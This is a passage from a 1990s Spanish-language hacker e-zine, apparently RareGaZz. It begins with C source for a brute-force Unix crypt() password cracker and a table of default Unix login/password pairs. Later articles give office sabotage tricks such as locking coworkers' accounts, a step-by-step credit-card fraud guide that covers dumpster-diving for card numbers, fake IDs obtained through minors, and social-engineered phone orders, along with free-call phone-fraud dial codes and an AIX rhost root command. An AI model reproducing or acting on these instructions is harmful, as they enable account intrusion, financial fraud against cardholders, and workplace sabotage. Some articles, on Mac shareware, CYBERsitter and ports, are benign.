   int p3 = busca(longitud,cadena,proceso.c6[3]);
   int p4 = busca(longitud,cadena,proceso.c6[4]);
   int p5 = busca(longitud,cadena,proceso.c6[5]);

   for (cont = p0; cont < longitud; cont++)
   {
      proceso.c6[0] = cadena[cont];

      for (cont2 = p1; cont2 < longitud; cont2++)
      {
         proceso.c6[1] = cadena[cont2];

         for (cont3 = p2; cont3 < longitud; cont3++)
         {
            proceso.c6[2] = cadena[cont3];

            for (cont4 = p3; cont4 < longitud; cont4++)
            {
               proceso.c6[3] = cadena[cont4];

               for (cont5 = p4; cont5 < longitud; cont5++)
               {
           proceso.c6[4] = cadena[cont5];

           for (cont6 = p5; cont6 < longitud; cont6++)
                  {
       proceso.c6[5] = cadena[cont6];
       desencripta = crypt(proceso.c6,clave);
       if (!strcmp(desencripta,clave))
       {
   encontrado(proceso.c6);
   abandonar();
       }

                     if ((contador++) == 60000)
                     {
                        copia();
                        contador = 0;
                     }
             }

             p5 = 0;
          }

          p4 = 0;
     }

     p3 = 0;
  }

  p2 = 0;
      }

      p1 = 0;
   }

   return;
}


void siete(int longitud, char *cadena, char *clave)
{
   void encontrado();
   void copia();

   char *crypt(), *desencripta;

   int cont, cont2, cont3, cont4, cont5, cont6, cont7;
   int p0 = busca(longitud,cadena,proceso.c7[0]);
   int p1 = busca(longitud,cadena,proceso.c7[1]);
   int p2 = busca(longitud,cadena,proceso.c7[2]);
   int p3 = busca(longitud,cadena,proceso.c7[3]);
   int p4 = busca(longitud,cadena,proceso.c7[4]);
   int p5 = busca(longitud,cadena,proceso.c7[5]);
   int p6 = busca(longitud,cadena,proceso.c7[6]);

   for (cont = p0; cont < longitud; cont++)
   {
      proceso.c7[0] = cadena[cont];

      for (cont2 = p1; cont2 < longitud; cont2++)
      {
         proceso.c7[1] = cadena[cont2];

         for (cont3 = p2; cont3 < longitud; cont3++)
         {
            proceso.c7[2] = cadena[cont3];

            for (cont4 = p3; cont4 < longitud; cont4++)
            {
               proceso.c7[3] = cadena[cont4];

               for (cont5 = p4; cont5 < longitud; cont5++)
               {
                  proceso.c7[4] = cadena[cont5];

                  for (cont6 = p5; cont6 < longitud; cont6++)
                  {
              proceso.c7[5] = cadena[cont6];

              for (cont7 = p6; cont7 < longitud; cont7++)
                     {
                 proceso.c7[6] = cadena[cont7];
   desencripta = crypt(proceso.c7,clave);
   if (!strcmp(desencripta,clave))
   {
      encontrado(proceso.c7);
      abandonar();
   }

                        if ((contador++) == 60000)
                        {
                           copia();
                           contador = 0;
                        }
                }

                p6 = 0;
                }

             p5 = 0;
          }

          p4 = 0;
     }

     p3 = 0;
  }

  p2 = 0;
      }

      p1 = 0;
   }

   return;
}


void ocho(int longitud, char *cadena, char *clave)
{
   void encontrado();
   void copia();

   char *crypt(), *desencripta;

   int cont, cont2, cont3, cont4, cont5, cont6, cont7, cont8;
   int p0 = busca(longitud,cadena,proceso.c8[0]);
   int p1 = busca(longitud,cadena,proceso.c8[1]);
   int p2 = busca(longitud,cadena,proceso.c8[2]);
   int p3 = busca(longitud,cadena,proceso.c8[3]);
   int p4 = busca(longitud,cadena,proceso.c8[4]);
   int p5 = busca(longitud,cadena,proceso.c8[5]);
   int p6 = busca(longitud,cadena,proceso.c8[6]);
   int p7 = busca(longitud,cadena,proceso.c8[7]);

   for (cont = p0; cont < longitud; cont++)
   {
      proceso.c8[0] = cadena[cont];

      for (cont2 = p1; cont2 < longitud; cont2++)
      {
         proceso.c8[1] = cadena[cont2];

         for (cont3 = p2; cont3 < longitud; cont3++)
         {
            proceso.c8[2] = cadena[cont3];

            for (cont4 = p3; cont4 < longitud; cont4++)
            {
               proceso.c8[3] = cadena[cont4];

               for (cont5 = p4; cont5 < longitud; cont5++)
               {
                  proceso.c8[4] = cadena[cont5];

                  for (cont6 = p5; cont6 < longitud; cont6++)
                  {
                     proceso.c8[5] = cadena[cont6];

                     for (cont7 = p6; cont7 < longitud; cont7++)
                     {
                 proceso.c8[6] = cadena[cont7];

                 for (cont8 = p7; cont8 < longitud; cont8++)
                        {
                    proceso.c8[7] = cadena[cont8];
      desencripta = crypt(proceso.c8,clave);
      if (!strcmp(desencripta,clave))
      {
         encontrado(proceso.c8);
         abandonar();
      }

                           if ((contador++) == 60000)
                           {
                              copia();
                              contador = 0;
                           }
                   }

                   p7 = 0;
                }

                p6 = 0;
                }

             p5 = 0;
          }

          p4 = 0;
     }

     p3 = 0;
  }

  p2 = 0;
      }

      p1 = 0;
   }

   return;
}
------------------------ cortar por aqui -------------------------------------

Ŀ
                         7-CUENTAS UNIX POR DEFECTO                        


Los sistemas Unix suelen tener varias cuentas por defecto. Cuentas que algunos
administradores algo lamers no quitan o protegen. Estas son las primeras que
debemos aadir a nuestro diccionario ... por si acaso  :)

login           passwd
----------------------
root            root
root            system
sys             sys
sys             system
daemon          daemon
uucp            uucp
tty             tty
test            test
unix            unix
unix            test
bin             bin
adm             adm
adm             admin
admin           adm
admin           admin
sysman          sysman
sysman          sys
sysman          system
sysadmin        sysadmin
sysadmin        sys
sysadmin        system
sysadmin        admin
sysadmin        adm
who             who
learn           learn
uuhost          uuhost
guest           guest
host            host
nuucp           nuucp
rje             rje
games           games
games           player
sysop           sysop
root            sysop
demo            demo


Ŀ
                                8-DESPEDIDA                                


Esto es todo por hoy. espero que te halla servido de ayuda y que me escribas
si tienes alguna duda. Tambien me gustaria que me corrigierais si es que me
he confundido en algo.

Podeis usar y distribuir estos 3 programas pero con la condicion de que dejeis
el copyright.

Un saludo.

                               -= Guybrush =-

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
    Durante la creacion de esta revista muchos sistemas han sido daados 
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

                      * COMO DESTRUIR A LA COMPETENCIA *
                         ...En un sistema de redes...
                                   por Mr.X

 Si en tu trabajo todos los empleados o la mayoria trabajan delante de una
 terminal seguramente usar la red de la oficina en ocasiones puede ser un
 dolor de cabeza sobre todo si hay por ahi en algun cubiculo un "chico listo"
 que siempre se salga con la suya al momento de usar el sistema de la Cia.
 Para derrotar al chico listo y a los demas compaeros de trabajo en nuestro
 camino a la cima basta con hacer caso a uno de estos sencillos tips.

 Como ser el primero en usar la impresora de la red
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
 Estas terminando tu trabajo de 25 hojas y necesitas entregarlo en menos de
 5 minutos. File - Print y te vas al piso de abajo donde esta la impresora
 de la red. En eso QUE! ahi estan enfrente de ti otras 7 personas esperando
 sus trabajos y resulta que el documento mas pequeo es de 30 hojas. En ese
 debes regresar a tu estacion de trabajo Windows y abrir el monitor de
 impresion. Selecciona los trabajos enfrente de ti y presiona "Pause Printing"
 asi los trabajos seran pausados y el tuyo permanecera activo. Cuando termine
 de imprimir tu trabajo no olvides de presionar "resume printing" para que
 nadie sospeche.

 Contrataca a los metiches
 ^^^^^^^^^^^^^^^^^^^^^^^^^
 No hay peor escoria en este mundo que aquellas personas que pegan un
 "receipt notice" en sus mensajes. Esta feature permite a la persona que
 envio el mensaje saber cuando lo abriste para leerlo pero que diablos!  por
 que alguien debe saber a que horas lees tu correo ? Lo que debes hacer es
 contratacar.
 No abras ningun mensaje con una "receipt notice" lo que necesitas hacer es
 usar otra feature de tu programa de comunicaciones "forward" y manda ese
 mensaje -sin abrir- a tu direccion. Cuando llegue a tu direccion la nota de
 recibo sera eliminada y podras leerlo con privacidad.
 La sorpresa que se llevara el lamer que haya tratado de espiar en tu
 privacidad cuando reciba respuesta sin antes recibir el aviso de que has
 leido su mensaje! Esto debe aplicarse al siguiente consejo.

 Protege tu fin de semana
 ^^^^^^^^^^^^^^^^^^^^^^^^
 Es viernes y estas a punto de ir a casa. El trafico te espera pero tambien
 una cena o una chica en la disco que invitaste a salir del otro lado de la
 ciudad. Antes de irte revisas tu correo por ultima vez y encuentras un
 mensaje de tu jefe solicitandote todo un resumen de actividades del mes!
 Ese trabajo podria llevarte todo el fin de semana y tendrias que estropear
 tus planes. Oh no contigo ni el jefe puede, inmediatamente mandas el mensaje
 a una direccion inexistente para que rebote. Despues de unos segundos tendras
 un mensaje con un error marcado. Copia la informacion del encabezado del
 mensaje de tu jefe al mensaje con el error a un mensaje nuevo. Tambien copia
 el subject y antes de salir de la oficina presiona "send". Ahora quien podra
 culparte por no hacer lo que un mensaje que nunca recibiste decia ??

 Roba tiempo de tu competencia
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
 Si tienes que robar un poco de tiempo a tu "compaero" de trabajo y sabes
 que necesita entregar un reporte entonces todo lo que tienes que hacer es
 llegar temprano a tu trabajo y usando una terminal de la LAN como la de la
 impresora o una estacion de trabajo extra escribe el login de tu competencia
 y escribe passwords erroneos una y otra vez hasta que aparezca el mensaje
 "Network access denied, contact your system administrator". Ahora has lo
 mismo con la cuenta de tu jefe y otros 2 compaeros para evitar sospechas.

 Panico en la oficina
 ^^^^^^^^^^^^^^^^^^^^
 Tu presentacion la preparaste desde hace dias y estas a punto de apantallar
 a tus jefes. En eso alguien intentando sabotear tu presentacion manda un
 mensaje a todos los del edificio mencionando un "nuevo virus" en su disco
 que se esta comiendo todos sus documentos urge un especialista se alcanza a
 leer al final del mensaje. Tu jefe -que nada sabe sobre virus- entra en
 panico total y ordena apagar el sistema hasta que los tecnicos revisen la
 red. Tu presentacion ha sido exitosamente saboteada al no poder usar ninguna
 de las computadoras de la compaia.

 De viaje y en aprietos
 ^^^^^^^^^^^^^^^^^^^^^^
 Tu archienemigo sale de viaje y lleva consigo su leal notebook que necesita
 para estar conectado con la oficina -y con el jefe-. Es necesario que
 prepares tu estrategia desde la oficina con un archivo de 10 a 15 megas.
 Mandalo como attachment a la direccion de tu enemigo para bloquearlo del
 jefe. Pero como unos programas dejan que no reciba los attachments
 complicando tu estrategia has decidido mandar otros 10 megas en el cuerpo del
 mensaje !! Asegurate de que no exista manera de rastrear el mensaje a tu
 direccion y es todo lo que necesitas para mover a la competencia.

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
    http://www.geocities.com/Baja/4426 - Mas Hits que Michael Jackson! - 
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]


                  
                                    
                                   
                          
                     @ Como obtener HARDWARE gratuito @
                                    ~~~~~~~~
          Texto +original+ de Raretrip dedicado a Visa y Mastercard

 Con las tarjetas de credito podemos ordenar codigos de registro o passwords
 para entrar a sitios con material pornografico y pedirlos a una cuenta de
 correo anonima pero que pasa cuando queremos obtener hardware? Quiero darles
 una idea de como obtener equipo para nuestra computadora, videos de musica,
 cassettes o regalos para la abuela y novia sin tener que gastar un peso ni
 arriesgar nuestra libertad.

 Para empezar a planear una compra usando la informacion de una tarjeta de
 credito primero necesitas conseguir los datos de la cuenta. Esto es lo mas
 importante de todo. Para obtenerla puedes usar el sistema de computo de un
 hotel o restaurant donde casi siempre tienen los numeros de tarjeta y
 direcciones de los dueos disponibles en cualquier terminal. Si conoces
 alguien que trabaje en la recepcion de un hotel ofrecele dinero por la
 informacion en ocasiones puedes hacer esto sin conocer al trabajador por
 medio de un amigo o conocido.
 El problema de conseguir los numeros de tarjeta de las copias carbon es que
 no se consigue la direccion o numero telefonico aunque esto tambien tiene
 una solucion y se conoce como: directorio telefonico.
 Si te diriges a la zona turistica de tu ciudad y recojes una o dos bolsas
 de basura seguramente encontraras mas de 20 hojas amarillas o copias carbon
 con la informacion basica del dueo de la tarjeta. La informacion que se
 obtiene de una copia amarilla de la tarjeta es:

              Nombre:
    Numero de Cuenta:
 Fecha de Expiracion:
     Tipo de tarjeta: Visa o Mastercard de acuerdo a los digitos.

 Esta es toda la informacion necesaria para hacer una compra en internet de
 software. Pero para comprar digamos un modem o algo mas grande es necesaria
 mas informacion para que parezca una compra legitima. La informacion
 necesaria para hacer una compra por telefono o en internet de Hardware es:

              Nombre:       \
    Numero de Cuenta:         \_____ Estos datos son faciles de conseguir.
 Fecha de Expiracion:         /
     Tipo de tarjeta:       /
           Direccion:       \
       Codigo Postal:         \_____ 4 datos mas...eso significa mas trabajo!
              Ciudad:         /
                Pais:       /

 Asi que ya conseguiste los primero 4 datos buscando entre la basura de un
 restaurant o alguna tienda . . . ahora que ? Tienes dos opciones una mas
 facil que la otra:
 1) Comprar codigos de software.
 2) Comprar cualquier cosa que quieras.
 Si te decides por la primera opcion puedes dirigirte a cualquier tienda en
 internet y comprar los codigos de cualquier programa shareware pero si lo
 que quieres es la segunda opcion no uses la informacion para ninguna compra
 y espera hasta que consigas toda la informacion necesaria.
 RECUERDA: No uses dos veces la misma tarjeta o direccion!

 Para conseguir la direccion simplemente usa alguna guia telefonica o base
 de datos como las que se pueden encontrar en American Online o Compuserve.
 Cuando tengas la direccion puedes deducir el codigo postal, la ciudad y el
 pais con facilidad. Solo existe un problema, que pasaria si no tienes acceso
 a las bases de datos? Pues adios compra. Por eso es importante que tengas
 contactos en hoteles o restaurantes ya que ellos pueden conseguir toda la
 informacion en sus computadoras. Otra cosa que puedes hacer es conseguir
 numeros de tarjetas locales asi la direccion estara disponible en tu guia
 de telefonos local. Para conseguir numeros de tarjeta de personas que vivan
 en tu localidad todo es tan simple como visitar el basurero de una tienda
 indispensable para los locales y no una para los turistas.
 Supongamos que encuentras la direccion donde vive el dueo de la tarjeta en
 tu guia local y ahora necesitas su codigo postal verdad? Pues hablale por
 telefono y preguntale! O visita tu oficina postal y ahi investiga en esos
 utiles mapas con los codigos que tienen ellos :-)
 Ahora que tienes los 8 datos necesarios es hora de pasar a...

 .Conseguir la direccion destino
 
 De nada te servira pedir cualquier cosa si va a terminar en la casa del dueo
 de la tarjeta por eso necesitas una direccion donde puedan enviarte lo que
 pidas pero como hacerlo? SIMPLE! Si vives en cualquier estado de Mexico esta
 es la parte mas facil. Consigue a un menor de edad (14 a 15 aos) y crea una
 credencial falsa de estudiante usando un scanner de fotografias y una
 impresora a color con buena resolucion (disponibles en cualquier negocio de
 diseo grafico). Ahora lo necesario antes de ir a tu oficina de correos local
 es una credencial con un nombre inexistente de alguna secundaria o prepa
 local y 50 pesos para pagar la cuota por un apartado postal por el resto del
 ao y una actitud segura. Puedes pedir a un amigo de unos 15 aos que te
 haga el favor de comprar un apartado postal, si acepta entonces falsifica una
 credencial y cambia el numero de matricula. El costo aproximado de la I.D.
 falsa es de 25 pesos (scaneado e impresion). Si tu eres o pareces menor de
 edad entonces tu puedes ir a tu oficina de correos con la credencial y 50
 pesos (eso cuesta un apartado postal). En menos de 25 minutos tendras ya la
 llave de un apartado postal a nombre de alguien inexistente y 50 pesos menos.
 Si te dan problemas los de la oficina de correos (nunca lo hacen) di que te
 iniciaste en un programa de correspondencia y el correo no llega hasta tu
 colonia. Inmediatamente te daran el apartado (pagando desde luego) y te
 pediran una identificacion que puede ser una credencial escolar que debe ser
 modificada preferentemente ya que anotaran el nombre y numero de matricula
 pero no guardan copia de la foto o la credencial.
 Ahora ya tienes una direccion donde podras recibir tu pedido...perfecto!

 .Hacer la orden

 Primero necesitas saber que vas a pedir. Esto puedes hacerlo por medio de
 catalogos, programas de television o tiendas en internet. Las tiendas en
 internet debes buscarlas usando una maquina de busqueda como www.infoseek.com
 y busca "tienda electronica" o "plaza virtual". Ya que hayas encontrado la
 tienda o negocio donde vayas a realizar la compra debes hacer la llamada o
 llenar la forma en caso de ser una compra en internet.
 Como antes se ha dicho es SUPER NECESARIO EL ENVIO INMEDIATO de lo que pidas.
 Asegurate de que el pedido sea enviado cuando mucho al dia siguiente por
 paqueteria aerea. Este es realmente el unico problema ya que la mayoria de
 las tiendas en linea piden de 3 a 4 semanas para enviar el paquete. Una forma
 de contrarrestar esto es por medio de una compra telefonica que es lo que
 recomendaria mas. Antes de dar la informacion de la tarjeta a la operadora
 asegurate de preguntar sobre paqueteria aerea y preguntar cuanto costara
 casi siempre es 15% o 20% mas del precio de lo que pidas. Acepta, dales la
 informacion y cuelga.

 Si por algun motivo te piden un numero telefonico no dudes en darles un
 numero que siempre de tono de ocupado o alguno desconectado. Por ahi me
 entere de que en ocasiones piden mandar una copia de la tarjeta de credito
 o de la ficha de deposito pero aun no me he encontrado ninguna compaia que
 lo pida excepto uno que otro proveedor de espacio web. En geocities con la
 informacion de la tarjeta puedes conseguirte 5 megas!

 Decirte COMO hacer la llamada no tiene caso es tan facil como seguirle la
 corriente a la operadora y darle los datos -EXCEPTO- cuando pregunta
  Desea que su pedido sea enviado a la direccion donde se cobra la tarjeta ?
 Ahi es donde debemos mostrar nuestro conocimiento de ingenieria social y
 decir algo como:

 "No, es un regalo para mi esposa(o)/hermano(a)/hijo(a) y no deseo que se de
  cuenta cuando llegue el paquete podria enviarlo al apartado postal #0000?"

 O tambien:

 "No, estoy usando la tarjeta de la compaia y preferiria que llegara a..."

 Otra vez, *NO* ofrezcas la informacion de la tarjeta hasta que te aseguren
 que pueden enviar el paquete en menos de 2 a 5 dias. Entre mas tiempo se
 tarde en llegar algo, mas probabilidad existe de que te agarren.

 .Recoger la mercancia

 En un articulo anterior que aparecio en esta revista se menciona este paso
 como el mas dificil pero si no han pasado mas de 2 o 3 dias desde que
 hiciste el pedido no existira problema alguno. Simplemente vas con tu llave
 del apartado postal a la oficina de correo temprano y sacas tu paquete
 rapido. Procura usar un sistema de transporte publico para alejarte del
 lugar por si las dudas...

 Es necesario recordarte que no vuelvas a usar el mismo apartado bajo ninguna
 circunstancia y cuando tengas lo que hayas pedido nunca se te ocurra decir
 como lo obtuviste. Cuando completes tu primer compra con carding espera
 algun tiempo antes de empezar a usar lo que pediste y no tires las envolturas
 ya que en caso de que algo te haya salido mal solo necesitaras regresar la
 mercancia tal y como la recibiste para salir del aprieto :-)

 .Apendice

 Vendedores por Telefono en Mexico:
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
       CV directo
       ~~~~~~~~~~
       * Entregan de 3 a 5 dias
       * Aceptan Bancomer, Banamex, Mastercard, etc.
       * Pregunta por Catalogo. Tienen equipo de computo pero tambien
         maquinas de ejercicio, cuchillos, medicinas, videos, etc.
       * 01 (5) 6288528

       Desconocido
       ~~~~~~~~~~~
       * No se cuanto tarden en entregar.
       * Aceptan Bancomer, Banamex, Mastercard, etc.
       * Pregunta por Catalogo. Tienen muchos productos.
       * 01 (5) 2781141

 Excusas validas en caso de aprietos:
 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      " No se como llego este paquete a mi direccion! Alguien debio haberlo
        enviado aqui por equivocacion... "

      " Pense que alguien de la casa lo habia pedido pero cuando les pregunte
        quien fue todos dijeron que no era de ellos asi que decidi guardarlo
        hasta que supiera de quien era... "

      " Oh dios mio asi que asi fue como llego esto a mi direccion Eh? "

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
       http://www.microsoft.com " Que sistema quieres hackear hoy ? " 
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
 
                              *******************
                            > PHREAKING & HACKING <
                              *******************

                    "No hay nadie mas esclavisado que aquel
                    que falsamente piensa que es libre."

 Bien primero que nada me llamo Azum Lord y este truco sirve para tener
 llamadas totalmente !!! GRATIS !!!! y es el siguiente:

Tienes que escribirlo tal y como esta incluyendo el #.

Primero marcas:
91 800 92 450 #

Despues te contesta una operadora y marcas lo sig.
100 54 #

Y despues
10 54 #

Y para finalizar
00 91 84 ( Aqui va el telefono a donde quieres hablar ) #

NOTA: En el ejemplo de arriba el 84 es el codigo de la ciudad a donde
quieres hablar en este ejemplo es de Saltillo Coahuila, Mexico. Por el momento
el truco ya no funciona dentro de Saltillo pero puede hacerlo de otras partes.

 Para llamar gratis de un telefono gratuito:
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 Primero marcas a un numero gratituo antes (91 800) ahora (01 800)
 cuando contesten lo que tienes que hacer es hacer que el que te conteste te
 cuelgue e.j.

     Cia -Bueno habla XXXXX en que le puedo ayudar???
     Hacker -Si bueno quien habla????
     Cia -Bueno????
     Hacker -Bueno, Bueno, Bueno Seorita que se le ofrece???
     Cia -*&^$%@#$(*&$#@

 Y ahi esta, ella te cuelga y te deja con tono y puedes hacer tu
 llamada. je, je };-)
 Nota: En algunos telefonos de tarjeta les cancelan este tipo de llamadas.

  [ Este truco no sirve en telefonos publicos Telnor de tarjeta y moneda. De
    hecho aun no se en que tipo de telefonos funcione ;) ]

 Si alguien tiene problemas con un sistema AIX 3.x la forma mas sencilla de
 conseguir r00t es usando el comando rhost como en el siguiente ejemplo:

% rhost (host) -l -froot
^         |
|         |________________ El host con el sistema AIX (Unix de IBM)
|--- Representa el prompt!

 Y !!!! Bingo  tienes el root antes de entrar te recomiendo que tengas
 preparado un zap, sniffer o caballo de troya listos para ser compilados
 te lo digo por experiencia :-(

 si tienen algun sniffer para AIX 3.2 les pido me lo manden :-).
                         [ Y tambien a la revista :) ]

 Si quieren conseguir bugs, exploits, sniffers, zaps, listas de palabras,
 hasta software benigno de seguridad visiten esta pagina de rumania:

 http://sunshine.nextra.ro

 Tambien hay un enlace para una pagina donde hay exploits, trojans ping's of
 death, etc. para WinNT !!!!!.

 Listas de Palabras:

  ftp://sable.ox.ac.uk/pub/wordlists/
  ftp://sun.rediris.es/mirror/sable/wordlists/

                   Esta es una BBS del merito Monterrey N.L.
                              sinet.sinet.com.mx
                              ~~~~~~~~~~~~~~~~~~
 Para registrarse en el login se escribe bbs ya adentro para registrarte te
 tienen que enviar un mail pero no se tarda mas de 1 min.

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\

 Esta es una forma de hackear el programa Crow Control que regula algunas
 funciones de windows como por ejemplo quita el comando ejecutar, ayuda,
 configuracion y buscar del menu inicio, quita las funciones del boton derecho
 del mouse el MSDOS y el explorer, tambien al iniciar la computadora no lee la
 unidad a:, incluso oculta la unidad C:, a simple vista parece imposible
 quitarlo pero si te vas al wordpad en accesorios, seleccionas Abrir, luego
 parece que no hay unidad c: pero tu escribes c:\autoexec.bat y bingo aparecen
 los directorios y entonces comienzas a editar y agregas estas lineas:

 cd\
 cd archiv~1   (la mayoria de las veces esta aqui recomiendo que lo verifiques
                antes de editar el autoxec.bat )
 path=c:\windows\command\
 deltree /y crow*.*

 Y listo ahora solo tienes que reiniciar y de esta forma es facil quitar el
 Crow Control aunque tambien funciona con otros programas parecidos.

 [ Si quisieramos remover el programa pero no permanentemente editariamos el
   autoexec.bat de esta forma:

   cd\
   cd archiv~1
   md temp
   path=c:\windows\command\
   move crow* temp

 Ahora todos los archivos del programa Crow habran quedado en:
 C:\ARCHIVOS\TEMP\CROW* ( * representa el nombre del directorio completo )  ]

 3zP3r0 Ke L3z gUz73 ..... AzumLord@Hotmail.com

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
                 Y ahora un StripTease por . . . Cinthia !! 
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
 
                         LOS HACKERS DE LAS MACINTOSH
                         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                            Macz l0v3r:Nopal Picudo
                            ^^^^^^^^^^^^^^^^^^^^^^^
 Entre los downloads mas populares en internet estan varias aplicaciones y
 extensiones escritas por Greg Landweber. Probablemente no reconozcas el
 nombre de este matematico graduado de Harvard, musico y desarrollador de
 shareware. Pero probablemente hayas escuchado de Aaron, la extension que
 modifica la interfaz de la Mac para verse como el sistema prometido de Apple
 "System 8". Y quizas hayas probado BeView, que hace parecer a tu Mac como el
 proximo BeOS.
 Recientemente Landweber, con amigos como Ed Voas y Fred Bass sacaron
 Kaleidoscope, una version mejorada de Aaron que ofrece una variedad de
 colores como Onyx y Ice. Hasta el momento la mayoria de las "escenas de
 colores" son un poco raras por ejemplo una de las escenas cambia el boton
 de cerrar ventana por una esfera rosa. Lo mejor de Kaleidoscope es que
 permite a cualquier desarrollador escribir sus propios diseos para la
 Mac. Algunos diseos nuevos como Star Wars estan saliendo.
 Kaleidoscope no aade ninguna funcion practica a las Macs - aade otra cosa
 que habia sido desterrada: diversion, en algunos casos hermosa. La primera
 Mac nos dio iconos, menus de cascadas, ventanas y el puntero. Pero Apple
 se ha dormido en el volante. Afortunadamente Landweber, Voas y Bass estan
 manteniendo viva la tradicion de diseo ingenioso de Apple.

 Si lo que buscas es funcionalidad, el browser de Greg ofrece una simple
 pero inovadora forma de acceder a los contenidos de tu computadora. La
 ventana del monitor se divide en 3 o 4 paneles que te permiten desplazar por
 todo el disco duro manteniendo la vista en distintos directorios al mismo
 tiempo - puedes encontrar archivos sin abrir demasiadas ventanas. Tambien
 podrias arrastrar hasta 8 iconos en espacios colocados en la parte superior
 de la pantalla para acceso instantaneo. La mejor cosa de este browser es que
 permite sumergirnos en archivos stuffit tan facil como si fueran directorios.
 El shareware que Greg's produce para las Macs lo puedes encontrar en:
 http://greg.math.harvard.edu

 Mientras Apple se fusiona con la nueva generacion de sistemas operativos -
 Rhapsody esta prometido para 1998 - Landweber nos permite probar la interfaz
 del futuro ahora. Apple recientemente contrato a Ed Voas el co-desarrollador
 de Aaron para dirigir la division de diseo. Parece que Apple reconoce al
 talento cuando lo ve.

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
                            RareGaZz?? Punks!! 
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

                              + CYBERsitter +
                     "a donde NO quieres que vayan hoy?"

 Solid Oak Software, los creadores de CYBERsitter promueven su producto como
 una forma mediante la cual los padres podran "limitar el acceso de los nios
 al material dudoso de Internet". Pero la lista de web sites, palabras y
 frases que son filtradas por el programa estan guardados en un archivo
 encriptado por lo que ni los usuarios registrados pueden saber que es
 exactamente lo que CYBERsitter bloquea excepto intentando y fallando.

 Como resultado de esto, poca gente sabia en realidad que era lo que este
 programa bloqueaba a los usuarios pero en Julio de 1996 varios grupos
 que apoyan los derechos de gays/lesbianos se quejaban que Cybersitter
 filtraba las palabras "homosexual" y "gay rights" de las paginas web. Entre
 los sitios bloqueados se encuentran la Organizacion Nacional de las Mujeres
 http://www.NOW.org y la Organizacion de los Derechos Humanos de Gays en
 http://www.iglhrc.org.  Ese Julio, un articulo fue publicado en CyberWire
 por Brock Meeks que advertia del tipo de material que era bloqueado por
 CYBERsitter, Cyber Patrol y Net Nanny. El articulo esta disponible en:
 http://www.eff.org/pub/Publications/Declan_McCullagh/cwd.keys.to.the.kingdom.0796.article

 Brian Milburn, CEO de Solid Oak Software, amenazo con una investigacion
 criminal por medio del FBI quejandose que el conocimiento de la gente del
 material bloqueado por su programa devaluaba su producto:
 http://peacefire.org/archives/SOS.letters/bm.2.dm.8.15.96.txt

 En noviembre de 1996, Peacefire publico una pagina que criticaba a
 CYBERsitter en: http://www.peacefire.org/censorware/CYBERsitter/
 exponiendo mas paginas, palabras y frases que el programa bloqueaba.

 Ahora, CYBERsitter esta bloqueando el web site de Peacefire entero y ha
 amenazado con una demanda contra Peacefire por publicar la pagina.
 CYBERsitter tambien ha bloqueado `The Ethical Spectacle' por publicar una
 copia de este articulo.

 En respuesta a CYBERsitter se creo el programa CSDECODE.EXE que permite a
 cualquier persona que tenga una copia de este programa saber que tipo de
 websites y palabras filtra este programa. Este programa es considerado un
 fuerte golpe contra las ventas de Cybersitter.

 Por otro lado yo creo que es un alivio para los padres el dejar la
 responsabilidad moral y social de educar a sus hijos a una pieza de software.
 Despues de todo nuestros padres no son mas que codigo amaestrado y repleto de
 bugs asi que si una compaia promete reemplazarlos y de paso quitarles la
 molestia de educar a sus hijos fenomenal! Viva la mediocridad en las
 familias! - viva la irresponsabilidad!  VIVA CYBERsitter !!

 El programa puedes bajarlo aqui :
 http://www.pow-dist.co.uk/solidoak/cyber.html
 ftp://ftp.pow-dist.co.uk/pub/demos/cybsetup.exe

 Y el crack para ver la lista de sitios bloqueados puedes bajarlo en la
 pagina de software de la revista seccion Internet.

 Original por: Bennett Haselton
 Llevado a la pantalla por: LePompeItor

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
           Y ahora un ensayo sobre la inmortalidad del espiritu... 
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

                                *  PUERTOS  *
                            cmeinel@techbroker.com

 Un puerto en la computadora es por donde la informacion fluye hacia dentro
 o hacia fuera. Los dispositivos Hardware como la impresora o modem pueden
 ser llamados puertos, un puerto que manda informacion fuera de tu computadora
 puede ser el monitor o la impresora. Un puerto que recibe informacion seria
 el modem o un scanner.

 La diferencia entre un puerto de Internet a un puerto comun es que un Host
 de internet tiene muchos mas puertos que un computadora tipica. Ademas,
 los puertos de un Host no son Hardware sino software y estan identificados
